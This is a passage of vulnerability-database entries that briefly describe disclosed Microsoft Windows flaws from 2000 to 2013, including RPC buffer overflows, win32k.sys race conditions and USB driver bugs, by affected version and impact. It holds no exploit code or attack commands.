[CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2004-0569] The RPC Runtime Library for Microsoft Windows NT 4.0 allows remote attackers to read active memory or cause a denial of service (system crash) via a malicious message, possibly related to improper length values. [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to cause a denial of service via malformed inputs. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3127] The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows Media Format Runtime 9 and 9.5, and wmvdecod.dll in Windows Media Format Runtime 11 and Windows Media Player 11 and 12 allows remote attackers to execute arbitrary code via a crafted media file, aka "WMV Video Decoder Remote Code Execution Vulnerability." [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1337] Microsoft .NET Framework 4.5 does not properly create policy requirements for custom Windows Communication Foundation (WCF) endpoint authentication in certain situations involving passwords over HTTPS, which allows remote attackers to bypass authentication by sending queries to an endpoint, aka "Authentication Bypass Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1333] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1313] Object Linking and Embedding (OLE) Automation in Microsoft Windows XP SP3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted RTF document, aka "OLE Automation Remote Code Execution Vulnerability." [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1299] Microsoft Windows Modern Mail allows remote attackers to spoof link targets via a crafted HTML e-mail message. [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0078] The Microsoft Antimalware Client in Windows Defender on Windows 8 and Windows RT uses an incorrect pathname for MsMpEng.exe, which allows local users to gain privileges via a crafted application, aka "Microsoft Antimalware Improper Pathname Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 